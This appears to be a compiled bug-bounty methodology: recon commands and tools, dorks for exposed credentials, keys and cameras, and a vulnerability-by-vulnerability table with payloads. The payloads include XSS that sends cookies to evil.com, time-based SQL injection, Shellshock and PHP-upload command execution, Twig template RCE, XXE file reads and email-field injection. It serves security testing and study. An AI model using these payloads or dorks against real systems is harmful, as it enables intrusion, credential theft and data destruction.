Recon workflow

Horizontal & vertical Correlations

https://mxtoolbox.com/asn.aspx
https://viewdns.info/reversewhois
https://domaineye.com/
amass intel -org <company name here>
amass intel -asn <ASN Number Here>
amass intel -cidr <CIDR Range Here>
amass intel -whois -d <Domain Name Here>
amass enum -passive -d <Domain Name Here>
https://github.com/danielmiessler/SecLists
Subdomain bruteforcing - https://gist.github.com/jhaddix/86a06c5dc309d08580a018c66354a056
https://github.com/internetwache/CT_subdomains
https://crt.sh/?q=%25.facebook.com
https://github.com/ghostlulzhacks/CertificateTransparencyLogs
gobuster dns -d starbucks.com -w subdomains.txt
https://github.com/infosec-au/altdns
A small list of these
resources can be found below:
● Virus Total
● Netcraft
● DNSdumpster
● Threat crowed
● Shodan
● Cencys
● DNSdb
● Pastebin
knockpy.py <Domain Name Here>
https://github.com/blechschmidt/massdns

finding aws endpoints, awskeys, urls, upload fields

https://github.com/incogbyte/jsearch

Google dorks
site:<Third Party Vendor> <Company Name>
site:pastebin.com “Company Name”
site:*.atlassian.net “Company Name”
site:bitbucket.org “Company Name”
Inurl:gitlab “Company Name”
https://pentest-tools.com/information-gathering/google-hacking#

Shodan dorks
net:<”CIDR,CIDR,CIDR”>
org:<”Organization Name”>
ssl:<”ORGANIZATION NAME”>

Censys - https://censys.io/ipv4

waf - https://github.com/EnableSecurity/wafw00f
Wafw00f <URL HERE>

wafbypass - https://github.com/0xInfection/Awesome-WAF#known-bypasses

subdomaintakeover - https://github.com/haccer/subjack
https://github.com/EdOverflow/can-i-take-over-xyz

github dorks - https://github.com/techgaun/github-dorks/blob/master/github-dorks.txt

Aws s3
s3bucket dorks - site:.s3.amazonaws.com "Starbucks"
https://github.com/ghostlulzhacks/s3brute
python amazon-s3-enum.py -w BucketNames.txt -d <Domain Here>

Google cloud storage

https://github.com/RhinoSecurityLabs/GCPBucketBrute
python3 gcpbucketbrute.py -k <Domain Here> -u

Digital ocean spaces

site:digitaloceanspaces.com <Domain Here>
https://github.com/appsecco/spaces-finder

Unauthenticated Elasticsearch DB
port "9200" elastic [;shodan query]

Exposed Docker api

product:docker [;shodan query]

Kubernetes API
unauthenticated REST API on port 10250
product:"kubernetes"

Gitdumper (.git) - https://github.com/internetwache/GitTools/tree/master/Dumper

Subversion (.svn)- https://github.com/anantshri/svn-extractor

Exploitation CMS
Wordpress - https://github.com/wpscanteam/wpscan
Joomla - https://github.com/rezasp/joomscan
Drupal - https://github.com/droope/droopescan
adobe aem - https://github.com/0ang3el/aem-hacker
Magento - https://github.com/steverobbins/magescan

URLSCAN
https://urlscan.io/
https://rapiddns.io
https://sitereview.bluecoat.com/#/

Security Tools
https://tools.tldr.run/
 The Bug Hunter's Methodology v4.0 - Recon Edition by
TBHMv4 notes @jhaddix #NahamCon2020!

S.NO Techniques Tools Used/Website used

Acquisitions crunchbase
1) ASN lookup
2) Metabigor
2 ASN enumeration 3) Amass intel -asn asnnumber
1) whoxy.com
3 Reverse whois 2) Domlink
4 Ad/Analytics/technology identifiying builtwith.com
copyright text
terms of service text
5 Google-FU privacy policy text
Shodan - Captures response data, cert data, stack
6 profiling data & more Use Shodan membership api to fetch more info

Finding Subdomains
1 Linked & Js discovery Burpsuite Pro
With burpsuite pro
1) turn off passive
2) set forms auto submit
3) set scope, keywords
4) browse main site
5) spider all hosts
6) target ->scope -> advance scope control -> add host or
iprange
7) show only scope items
8) select all hosts -> engagement tools -> analyze target -> save
report as html file

Gospider & hakrawler

other tools used

Subdomain & Scraping Subdomain enumeration with Subdomainizer

1) find subdomains referenced js files
2) find cloud services referenced js files
3) use Shannon Entropy formula to find potentially sensitive
items in js files
2
if your just looking for subdomains use subscraper
Censys, Robtex, waybackmachine, dnsdumpster, PTRarchive.com
Finding Infrastructure sources netcraft, DNSDB search, Passivetotal etc
Search sources yahoo, google, baidu, bing,ask, dogpile etc
Certificate sources crt.sh, certspotter, certdb etc
hackertarget, security trails, virustotal, fsecure riddler,
Security Sources threatcrowd, threatminer etc
site:twithc.tv -www.twitch.tv
site:twithc.tv -www.twitch.tv -watch.twitch.tv
Scraping with google site:twithc.tv -www.twitch.tv -watch.twitch.tv -dev.twitch.tv
Scraping with Amass amass -d twitch.tv
Scraping with Subfinder v2 subfinder -d hackerone.com -v
python3 github-subdomains.py -t "githubpersonalaccounttoken"
Scraping with Github-subdomains.py -d twitch.tv > twitch.tv
Scraping with Shosubgo go run main.go -d twitch.tv -s "githubtoken"
Scraping with Cloud Ranges technique to monitor AWS, GCP, Azure for SSL

3 Subdomain bruteforcing
guessing for live subdomains with larget list of common
sudomains name
tool: Massdns
amass enum -brute -d twitch.tv -src
amass enum -brute -d twitch.tv -rf resolvers.txt -w bruteforce.
Sudomain Bruteforce with Amass list
shuffledns -d hackerone.com -w words.txt -r resolvers-excellent.
Sudomain Bruteforce with shuffleDNS txt
Subdomain Bruting lists -> tomnomnom - githubrepo -> all.txt
Asset note -> commonspeak2
altdns
dev1.company.com
dev2.company.com
dev-1.company.com
Alteration scanning

4 Portanalysis & Service Analysis

Portanalysis - Massscan massscan -p1-65535 ip --max-rate 1800 -oG outputfile.txt
Portanalysis - Dnmasscan dnmasscan outputfile.txt dns.log -p80,443 -oG masscan.log
scan the remote administration protocls for default passwords
Service scanning - Brutespray which takes nmap OG file format
Massscan -> nmapservice scan -oG -> brutespray credential
bruteforce

tool: github-search
github dork collections -> jhaddix github repo
fullmode on github and sensitive data exposure by
5 Github dorking @th3g3ntelmans video in bugcrowd

6 Screenshotting eyewitness, aquatone, httpscreenshot

7 Sudomain takeover can i takeover xyz - github repo

Sudomain takeover tools used SubOver & nuclei

Extending tools (interlace)

recon framework
8 Automation tools & framework used tomnomnom tools in github repo
 The Bug Hunter's Methodology v4.0 - Recon Edition by
TBHMv4 notes @jhaddix #NahamCon2020!

S.NO Techniques Tools Used/Website used

1) AdmiralGaust/bountyRecon
2) offhoursscoding/recon
3) Sambal0x/recon-tools
4) JoshuaMart/Autorecon
C-tier - Frameworks - found in github repos
6) yourbuddy25/Hunter
7) ultimate_recon.sh
8) https://gist.github.
com/dwisiswant05f647e3d406b5e984e6d69d3538968cd
1) capt-meelo/LazyRecon
2) phspade/Automated-Scanner
3) shmilylty/OneForAll
4) SolomonSklash/chomp-scan
B-tier frameworks - found in github repos
5) TypeError/domained
6) Screetsec/Sudomy
7) devanshbatham/Gorecon
8) LordNeoStark/tugarecon
1) Edu4rdSHL/findomain
A-tier frameworks - Found in github repos 2) SilverPoision/Rock-ON
3) epi052/recon-pipeline
1) Intrigue.io
2) AssetNote
3) spiderfoot
4) Project discovery framework -
S-tier frameworks - Found in github repos
use https://chaos.projectdiscovery.io/#/ - download
subdomains files of all public programs in hackerone &
bugcrowd
watch for new domains
Mindmaps XMind - Mind Mapping Software
 Google Dork Technique
Popular Google Dork
operators Details Example Github
this dork will show you the cached version of any
cache: website cache: securitytrails.com filename:.npmrc _auth
searches for specific text contained on any web
allintext: page allintext: hacking tools filename:.dockercfg auth
allintitle: exactly the same as allintext, but will show pages allintitle:"Security Companies"
that contain titles with X characters extension:pem private
it can be used to fetch results whose URL
allinurl: contains all the specified characters, allinurl client area extension:ppk private
used to search for any kind of file extensions, for
example, if you want to search for jpg files you filename:id_rsa or filename:
filetype: can use: filetype: jpg id_dsa
this is exactly the same as allinurl, but it is only
inurl: useful for one single keyword inurl: admin extension:sql mysql dump
used to search for various keywords inside the
intitle: title, for example, intitle:secu extension:sql mysql dump password
will search for titles beginning with “security” but filename:credentials
“tools” can be somewhere else in the page
rity tools aws_access_key_id
this is useful when you need to search for an
inanchor: exact anchor text used on any links, inanchor:"cyber security" filename:.s3cfg
useful to locate pages that contain certain
intext characters or strings inside their text, intext:"safe internet" filename:wp-config.php
will show the list of web pages that have links to
link: the specified URL, link: microsoft.com filename:.htpasswd
will show you the full list of all indexed URLs for filename:.env DB_USERNAME NOT
the specified domain and subdomain,
site: site:securitytrails.com homestead
wildcard used to search pages that contain filename:.env MAIL_HOST=smtp.
“anything” before your word, e.g. how to
* * a website, gmail.com
this is a logical operator, e.g. "security" "tips" will
show all the sites which contain “security” or “tips,”
| or both words. "security" "tips" filename:.git-credentials
used to concatenate words, useful to detect pages
Plus+ that use more than one specific key, security + trails
minus operator is used to avoiding
showing results that contain certain words,
e.g. security -trails will show pages that
use “security” in their text, but not those
Minus - that have the word “trails.” security -trails
This will show a lot of results that include
Log files username inside all *.log files allintext:username filetype:log
The following Google Dork can be used to detect
vulnerable or hacked servers that allow appending
“/proc/self/cwd/” directly to the URL of your
Vulnerable web servers website. inurl:/proc/self/cwd
With the following dork, you’ll be able to explore
public FTP servers, which can often reveal
Open FTP servers interesting things. intitle:"index of" inurl:ftp
.env files are the ones used by popular web
development frameworks to declare general
variables and configurations for local and online
ENV files dev environments. site:xyz.com/.env
SSH private keys are used to decrypt information
SSH private keys that is exchanged in the SSH protocol. intitle:index.of id_rsa -id_rsa.pub
In this case, we can use a simple dork to fetch
Putty Logs SSH usernames from PUTTY logs: filetype:log username putty
we are going to fetch excel files which may
Email lists contain a lot of email addresses. filetype:xls inurl:"email.xls"
We filtered to check out only the .edu domain
names and found a popular university with around
1800 emails from students and teachers site:.edu filetype:xls inurl:"email.xls"
The following Google hacking techniques can help
you fetch live camera web pages that are not
Live cameras restricted by IP.
Here’s the dork to fetch various IP based
cameras: inurl:top.htm inurl:currenttime
To find WebcamXP-based transmissions: intitle:"webcamXP 5"
And another one for general live cameras: inurl:"lvappl.htm"
if you’re one of those classic individuals who still
MP3, Movie, and PDF download legal music, you can use this dork to
files find mp3 files: intitle: index of mp3
The same applies to legal free media files or PDF
documents you may need: intitle: index of pdf intext: .mp4
we ran a dork that lets you fetch Weather Wing
device transmissions. If you’re involved in
meteorology stuff or merely curious, check this
Weather out: intitle:"Weather Wing WS-2"
S.No Vulnerability Name Approach Tool Used
Horizontal (admin-admin & user to user)/Vertical Privilege
1 Privilege escalation burpsuite
escalaiton (User-admin)

2 Privacy settings bugs burpsuite

Check if session tokens/access tokens on

-Expires on logout
-password reset/change
3 Session bugs burpsuite
-expires on user removal
-expires on changing roles
- insufficient session fixation - cookie editor extension used
curl command to detect: curl http://site.com -H "Origin:http://evil.
com" -I
if it is access-allow-origin:* - not exploitable
4 Insecure CORS misconfiguration origin: evil.com Corsy/burpsuite
origin: site.evil.com
origin: null
if any site disclosing usernames & password, try cors exploit.
intercepting the victim request & generating csrf poc & sent to
server as a attacker
- CSRF can be get or post based
- try in all state changing requests
use: jsfiddle.net online tool
check it validates orgin/referer if not csrf possible
check it is cookie based authentication
if anticsrf tokens are there,,
1) remove anticsrf tokens & parameter
5 CSRF jsfiddle.net/burpsuite
2) pass blank paramter
3) add similar length token
4) add another userss valid anti csrf token
5) random token in long length (aaaaaaaaa)
if content-type verfication
1) if no anitcsrf tokens are there
2) try content-type=text/plain
flash csrf
check if any crossdomain policy
use swf json tool
1) inputvalue(try payload like '"batman()<>) reflected without xss
protection
2) xss validator - Intruder
3) host header injection through xss
add referer: batman
hostheader: bing.com">script>alert(document.domain)</script><"
4) URL redirection through xss
document.location.href="http://evil.com"
5) phishing through xss - iframe injection
<iframe src="http://evil.com" height="100" width="100"></iframe>
6 XSS 6) Cookie stealing through xss xss validator/burpsuite
document.location.href="http://evil.com/p/?page="+document.cookie
7) file upload through xss
upload a picturefile, intercept it, change picturename.jpg to xss paylaod
using intruder attack
8) remote file inclusion (RFI) through xss
php?=http://brutelogic.com.br/poc.svg - xsspayload
9) convert self xss to reflected one
copy response in a file.html -> it will work
10) xss through uri parameters
site.com/about/xss"><script>
1) url redirection through host header (check url having 2xx, 3xx)
real host to bing.com
X-forwarded-host: realweb.com
7 Host header injection X-forwarded-host: bing.com burpsuite
2) webcache poisoning through HHI
injection will be reflected in any buttons of page
3) host header attack on password reset page
4) xss through HHI
1) common parameter list: dest, redirect, uri, path, continue, url, window, to,
out, view, dir, show, navigation,
8 URL redirection or open redirect open, u, file, val, validate, domain, callback, return, page, feed, host, port, next, burpsuite
data, reference, site,
html
2) site.com/bing.com, site.com//bing.com, site.com/payloads
9 parameter tampering ecommerce websites burpsuite
1) get or post method
2) input value reflecting back
10 HTML injection burpsuite
3) <h1>adam</h1>
4) url direction via html injection
1) LFI & RFI
2) LFI
any.com/index.php?reference=login.php
3) RFI
any.com/?share=http://evil.com/
common parameter look on
11 File inclusion file, document, folder, root, path, pg, style, pdf, template, php_path, doc lfisuite tool from github
dest, redirect, uri, path, continue, url, window, next, data, reference, site, html,
val, validate, domain,
callback, return, page, feed, port, host, to, out, view, dir, show, navigation,
open
4) lfi - /var/www/html/ & /etc/passwd
../../etc/passwd
detecting - mxtoolbox.com anonymousmail.me
12 Missing spf, dmarc records
https://emkei.cz/
S.No Vulnerability Name Approach Tool Used
1) making request from vulnereable application to target website
2) common paramters to look on
dest, redirect, uri, path, continue, url, window, next, data, reference, site, html,
val, validate, domain, callback,
return, page, view, dir, show, file, document, folder, root, path, pg, style, pdf,
template, php_path, doc, feed, host,
port, to, out, navigation, open, result.
3) detection using https://www.expressvpn.com/what-is-my-ip & burp burpcollabator/https://www.expressvpn.
13 SSRF collabator also used com/what-is-my-ip
4) any.com/index/php?uri=http://external.com
exploitation of ssrf (read file from server, scan the internal network, ssrf wih
rfi)
5) read file from server - file:///identf- intruder on identifier- use lfi payloads
6) scan the internal network - http://localhost:1 (changing the port number
topcommonports like 21,22 etc)
7) ssrf with rfi - exceuting code from the external domain like (use hackoff.
html with xss script)
1) using https://github.
com/danielmiessler/SecLists/tree/master/Discovery/Web-Content
14 Critical file found & Source code disclosure burpsuite
payloads
2) use dirsearch
1) if the website is not used by the target which is laying in any
service provider.
15 subdomain takeover github.com/nahamsec/HostileSubBruteforcer
signingup on service provider like github, heroku, shopify, zendesk,
aws, tumblr etc to takeover domains

1) taking input as a command, reflecting output of that command

2) common parameters look on
daemon, host, upload, dir, execute, download, log, ip, cli, cmd, filename,
16 command injection 3) how to find cmdi: using delimiter list (like ;^&, &&, |, ||, %0D, %0A, \n, <) github.com/commixproject/commix.git
4) how to find - find a input field interacting with os shell
5) try with delimiter & shell commands
6) ;dir, ;/etc/passwd
7) intercept - use clusterbomb- first parameter for delimeter & 2nd for
command payloads
1) simple file upload - shell.php - fullcontrol of server - run
shellcommands
2) github.com/fuzzdb-projects/fuzzdb/tree/master/attack/file-
17 fileupload vulnerability upload/malicious-images github.com/almandin/fuxploider
3) pixel flood attack
4) content type verification
5) extension verification
1) inputfiled - use xxe payloads in intruder to detect
2) check website is accepting - content-type=text/xml header ->
common places to find xxe
200ok
1) xml file uplaod (eg:config files)
3) use online tool called pingb.in - check for external ping
2) xml input fields
18 XXE Injection 4) for blind xxe - use python -m SimpleHTTPServer 80
3) xml based apis
5) SYSTEM "file:///etc/passwd" for local file read
4) xml based files (rss, svg) Tool: pingb.
6) SYSTEM "http://systemip/readinganyfile" - blind xxe
in/burpsuite
7) php:// to get RCE
8) use Gopher or other URI Handlers to exploit xxe
1) preventing from bruteforce attack
2) intercept the login page with usercredentials with burp
3) sent the request to sequencer
19 account lockout burpsuite
4) or sent to intruder - make 1000 times request
5) do credential stuffings
6) the account needs to lock out for 30minutes to 24hrs
1) type of stored xss - attacker input saved in server - saved in
database
2) it wont be reflected
3) look for blind xss in pages like ( contact us, log viewers,
feedbackpage, chatapp,
20 blind xss ticket generation app, any app use moderation or updation, saving burpsuite/Xsshunter.com
forms)
4) online tool used - xsshunter.com
5) copy the payload & paste it in input field
6) reflection will be found on xsshunter.com
7) multiple blind xss using intruder
1) intercept loginpage - pass long string of passwords or any
quanitiy of input things
the page will load slow
21 Buffer overflow - web burpsuite
- types of overflows - buffer, stack, heap, integer, format strin
follows
2) dos using buffer overflow - application dos attack
1) wordpress, joomla, drupal, vbulletin, magento
wpscan, cmsmap, cmsscan, joomscan, drupwn,
22 CMS vulnerability hunting 2) find vulnerable component in the cms
vbulletin scanner, mage scanner, owaspVBScan
3) Search exploit in google
scenario - 1
1) mostly found on user settings or profile management
2) two accounts required
3) intercept the request - change emailid of attacker
4) logout
23 IDOR Burpsuite
5) try login with victim account - it wont work
scenario - 2 - user moderation
1) find user id
2) replace attacker id instead of victim id
3) do functionality
1) password - hashing - process - resource consumption by cpu
2) same like buffer overflow - but trying only in password field which
doesnt have
password length
24 Long password dos attack Burpsuite
3) try to signup a account
4) give details intercept the request
5) give password more then the length - forward the request
6) applicatian dos
S.No Vulnerability Name Approach Tool Used
1) capture forgot password page or even any request into burpsuite
2) sent to intruder
25 No rate limiting vulnerability - logical flow Burpsuite
3) make 1000 times request
4) it will affect both user & server
1) forget password page -> intercept in burpsuite
2) host header attack
26 Password reset poisiong Burpsuite
3) victim will receive emailid from the evilwebsite which mentioned
in hostheader
IDOR
Browsing with account 1
https://acme.com/changepw/id?=1234

you can create a 2nd account and you get assinged

https://acme.com/changepw/id?=5678
Common parameters
Broken Access control (Missing function if you completely logout & loginto account #1 and issue the request
id, user, account, number, order, no, doc, key, email,
level access control, IDOR, privilege with the uid from account #2. you may be able to change the
group, profile, edit
escalation, authorizationbypass, business accounts password. having to find users guids lower the priority
numeric values functions lookon
27 a but, but look for other endpoints that might alow you to search
logic flaws, forceful browsing, parameter change email, change password, upgrade/downgrade user
for a user's guid
manipulation, path traversal, local file role,
Hash based IDOR
create/remove/update/delete context specific app data
include) - usedid sometime hased with base64
shipping, invoices and document viewing
Local file inclusion, Path Traversal

GET /view?pg= termsandservices

GET /view?pg=../../../../../etc/passwd%00

Missing function level access control

forceful browsing
GET /admin/viewTransactions
GET /ADMIN/viewTransactions

static files
GET /patientIMAGES/3216647.jpg
GET /patientDocuments/21714.pdf
Burpextension used: authmatrix, authz, autorize &
Direction function calling
POST /admin/viewTransactions.ashx? autorepeater
admin=true&from=08032017&to=08032018

Parameter Manipulation & logic bugs

giving negative price

logic flow - ecommerce

skipping steps on workflows
additem->checkout->enter shippinginfo->payment
1) Intercept the forget password page
Account takeover via forget password
28 2) add X-Forwarded-Host: bing.com BurpSuite
page
3) forward the request
1)Create an account. 2) Change email id from A to B . 3) Now
29 Broken Access Control Generate forget password for email A. 4) Also try same concept on BurpSuite
password also.
1) Intercept the forget password page 2) Send to intruder 3) add X-
30 Rate Limiting bypass Burp Suite
Forwarded-Host: bing.com 4) Target to email 3) forward the request
31 Lack of Password confirmation Required to delete account, change emailid, Burp Suite

1)Go to registration section and fullfill all the requirement

2)Click to get code and intercept the request through burp proxy
3)Right click to request and send to intruder
32 2FA OR OTP Bypass Burpsuite
4)Bruteforce 6 digit through burp intruder because no rate limit and
other captcha verification or not implemented in get sms option
5) Analyze content length in burp intruder
6)After 1000 or more try attacker are able to bypass otp verification
or registration any mobile number without otp verification
1)Check input filed and inset payload like id=1
2) Inset in user-agent
3)Confirm change the time interval
Note Payload:
id=5+and+1=2
Blind SQL Injection ',0)waitfor delay'0:0:05'-- Burpsuite OR Cookie manager
33
1)if(now()=sysdate(),sleep(5),0)) --
2)(select(0)from(select(sleep(3)))v)/*'+(select(3)from(select(sleep(3)))
v)+'"+(select(0)from(select(sleep(3)))v)+"*/
3) 0'XOR(if(now()=sysdate(),sleep(3),0))XOR'Z
4) ' and extractvalue(1,concat(0x0a,@@version)) or'

1)Go to target website xyz.com

2) Create an account and Verify email address
3)Go to xyz.com/setting/profile
4)In company logo upload malicious file/image e.g:RCE.php%00.gif
and click on save.
5)Now left click on logo and view image
Remote Code Execution Vulnerability 6) A new url will open and at the end of url add ?cmd=id as you can Burpsuite OR Manually
34
see id command sucessfully execute
Scanerio-2
1)Crawal your target using burp suite check for /cgi-bin/status
2)Send to repeater
3)Replace user-agent: {:;};echo $(</etc/passwd)
4)Click on send and in response you will see root user info of web
server
1)Login using 3rd party app like facebook,gmail....
2)Intercept The request using burpsuite
Stealing Oauth Token
35 3)Change redirect_url=bugbountypoc.com Burpsuite
4)In case fail change referer header parameter to bugbountypoc.
com
S.No Vulnerability Name Approach Tool Used
1)Capture the request using burp suite
2)Send to repeater
3)In host header replace realweb with burp collaborater payload
36 External Service Intraction OR add new header x-forwarded-for:burpcollaborater payload Burpsuite
4)Forward the request
5)Check burp collaborater response are able to perform dns lookup

1)Intercept the request using burp suite

2)Spider the target host
3)Search .shtml extension page
Server side Include Injection
37 4)after finding these page input filed add payload Burpsuite
<!--#echo var="DATE_LOCAL" -->
5) Forward request and check in response

"Manual Checking
"1)Used toDisplay Dynamic Content on web page
curl -g 'http://www.target.com/page?name=John'
Hint: input reflect back then try to insert payload
curl -g 'http://www.target.com/page?name={{7*7}}'
2)Web Template enginewhich used this
Automation tool for SSTI exploitation:
FreeMarker - Java-based template engine
https://github.com/epinna/tplmap
Velocity - Java-based template engine
38 Client and server Side Template injection Basic Payload:
Smarty - PHP Template engine
{{7*7}}
Twig - PHP Template engine
{{7*'7'}}
Jade - Node.js Template engine
{% extends""/etc/passwd"" %}
Jinja2 - Python/Flask Template engine"
RCE PAYLOAD - TWIG: {{_self.env.registerUndefinedFilterCallback(""exec"")}}{{_self.env.getFilter(""id"")}}"

1)Download Image Form https://github.com/ianare/exif-samples

2) Goto jpg > Gotp GPS >Download Picture >save Into PC
exif.regex.info/exif.cgi
39 Exif GeoLocation Data Not Stripped 3) Upload Image on target website
4)Copy image url and paste into Tool
(http://metapicz.com/)
0)Capture request using burpsuite
1)Insert arbitry data in input filed like=aaaaaaaaaaaaa
2) If input reflect in response header its means that is vulnerable
Carriage Return: %0A
Linefeed : %0D
40 CRLF injection Burpsuite
3)Add Payload like %0a%0dxxxxxxxxxxxxx
4)After insert this payload if reflect response header with new line
then add new cooke header
5)return_url= aaaa%0a%0dset-cookie:mycookie

Ecommerce bugs to test on

1) Price manipulation during order placement
2) Shipping address manipulation after order placement
3) Absence of mobile verification for cash-on-delivery orders
4) Getting cash back/refunds even when the order is canceled
5) Non-deduction of discounts, even after order cancellation
6) Using automation techniques to perform illegitimate ticket blocking for a
certain period of time
7) Client-side validation bypass for maximum seat limit on a single order
8) Bookings/reservations using fake information
9) Usage of burner (disposable) phones for verification
Order management flaws
1) Coupon redemption, even after order cancellation
2) Bypass of a coupon’s terms and conditions
3) Bypass of a coupon’s validity
4) Use of multiple coupons for the same transaction
5) Predictable coupon codes
6) Failure of a recomputation in coupon value after partial order cancellation
32 Coupon and reward management flaws 7) Illegitimate use of coupons with other products
1) Price modification at client-side with zero or negative values
2) Price modification at client-side with varying price values
3) Manipulating the contact URL
4) Bypassing the third-party checksum
33 Payment gateway integration flaws 5) Changing the price before the transaction is completed
1) Flaws in transaction file management
2) Unusual activities involving role-based access control (RBAC), which
regulates access to computer or network resources
3) Flaws within the customer notification system
4) Misuse of rich-text editor functionalities (which edit text within web
browsers)
5) Flaws in third-party application program interfaces (APIs), which are used
to create specialized web stores
34 Content management system flaws 6) Flaws in integration with point-of-sale (POS) devices
35
Payload Result Injection StatusDescription
{"email":"[email protected]"} {"code":2002,"status":200" message":"email vlaid."} Vlaid
{"email":"[email protected]"} {"code":2002,"status":200" message":bad formate."} Not valid
{"email":\"asd a\"@a.com"} {"code":2002,"status":200" message":bad formate."} Not valid
{"email":"asd(a)@a.com"} {"code":2002,"status":200" message":bad formate."} Not valid
{"email":"\"asd(a)\"@a.com"} {"code":2002,"status":200" message":"email vlaid."} Valid
Email Verification Bypass Lead To SQL Injection
{"email":"asd'[email protected]"} {"code":0,"status":500,"message":"Unspecified error"} Not valid
{"email":"asd'or'1'='[email protected]"} {"code":2002,"status":200,"message":"Email is valid"} Valid
{"email":"a'-IF(LENGTH(database())>9,SLEEP(7),0)or'1'='[email protected]"} {"code":2002,"status":200,"message":"Bad formate"} Not valid
{"email":"\"a'-IF(LENGTH(database())=9,SLEEP(7),0)or'1'='1\"@a.com"} {"code":2002,"status":200,"message":"Email Sucess"} Valid Delay :7,854 milisecond
{"email":"\"a'-IF(LENGTH(database())=10,SLEEP(7),0)or'1'='1\"@a.com"} {"code":2002,"status":200,"message":"Email Sucess"} Valid Delay :8,696 milisecond
{"email":"\"a'-IF(LENGTH(database())=11,SLEEP(7),0)or'1'='1\"@a.com"} {"code":2002,"status":200,"message":"Email Sucess"} Valid No Delay
"' OR 1=1 -- '"@example.com
"mail'); DROP TABLE users;--"@example.com ? ?
Lead To Cross Site Scripting
“<script src=//xsshere?”@email.com
test+(<script>alert(0)</script>)@example.com
test@example(<script>alert(0)</script>).com
"<script>alert(0)</script>"@example.com
Template Injection
"<%= 7 * 7 %>"@example.com
test+(${{7*7}})@example.com
SSRF Injection
[email protected] (thanks @d0nutptr)
john.doe@[127.0.0.1]
Parameter Pollution
victim&[email protected]
Email Header injection
"%0d%0aContent-Length:%200%0d%0a%0d%0a"@example.com
"[email protected]>\r\nRCPT TO:<victim+"@test.com
Wildcard abuse
%@example.com
HTML injection in gmail
inti.de.ceukelaire+(<b>bold<u>underline<s>strike<br/>newline<strong>strong<sup>sup<sub>sub)@gmail.com
Bypassing strict e-mail validators through SSO chains & integrations
<script>alert(0)</script>[email protected] Google:No Github:Yes Twitter No
Two Different Account Register Using Same Email
[email protected] 1st account (Real Account)
[email protected] 2nd account(Fake Account)
MobileApp_PT Checklist
Penetration testing checklist based on OWASP Top 10 Mobile 2016

M1. Improper Platform Usage Test Name Result

M1-01 Misuse of App permissions Issue
M1-02 Insecure version of OS Installation Allowed Issue
M1-03 Abusing Android Components through IPC intents ("exported" and "intent-filter") Issue
M1-04 Misuse of Keychain , Touch ID and other security related controls Issue
M1-05 Minimum Device Security Requirements absent Issue
M1-06 Excessive port opened at Firewall Issue
M1-07 Default credentials on Application Server Issue
M1-08 Weak password policy Implementation Issue
M1-09 Exposure of Webservices through WSDL document Issue
M1-10 Security Misconfiguration on Server API Issue
M1-11 Security Patching on Server API Issue
M1-12 Input validation on API Issue
M1-13 Information Exposure through API response message Issue
M1-14 Control of interaction frequency on API (Replay Attack) Issue

M2. Insecure Data Storage Test Name Result

M2-01 Unrestricted Backup file Issue
M2-02 Unencrypted Database files Issue
M2-03 Insecure Shared Storage Issue
M2-04 Insecure Application Data Storage Issue
M2-05 Information Disclosure through Logcat/Apple System Log (ASL) Issue
M2-06 Application Backgrounding (Screenshot) Issue
M2-07 Copy/Paste Buffer Caching Issue
M2-08 Keyboard Press Caching Issue

M3. Insecure Communication Test Name Result

M3-01 Insecure Transport Layer Protocols Issue
M3-02 Use of Insecure and Deprecated algorithms Issue
M3-03 Use of Disabling certificate validation Issue
M3-04 SSL pinning Implementation Issue
M3-05 End-to-end encryption Issue

M4. Insecure Authentication Test Name Result

M4-01 Remember Credentials Functionality (Persistent authentication) Issue
M4-02 Client Side Based Authentication Flaws Issue
M4-03 Session invalidation on Backend Issue
M4-04 Session Timeout Protection Issue
M4-05 Cookie Rotation Issue
M4-06 Multiple concurrent logins Issue
M4-07 Exposing Device Specific Identifiers in Attacker Visible Elements Issue

M5. Insufficient Cryptography Test Name Result

M5-01 Cryptographic Based Storage Strength Issue
M5-02 Poor key management process Issue
M5-03 Use of custom encryption protocols Issue
M5-04 Token/Session Creation and handling Issue

M6. Insecure Authorization Test Name Result

M6-01 Client Side Authorization Breaches Issue
M6-02 Insecure Direct Object references Issue
M6-03 Missing function level access control Issue
M6-04 Bypassing business logic flaws Issue

M7 Client Code Quality Test Name Result

M7-01 Content Providers: SQL Injection and Local File Inclusion Issue
M7-02 Broadcast Receiver Issue
M7-03 Service component Issue
M7-04 Insufficient WebView hardening Issue
M7-05 Injection (SQLite Injection, XML Injection) Issue
M7-06 Local File Inclusion through NSFileManager or Webviews
M7-07 Abusing URL schemes or Deeplinks
M7-08 Sensitive Information Masking Issue

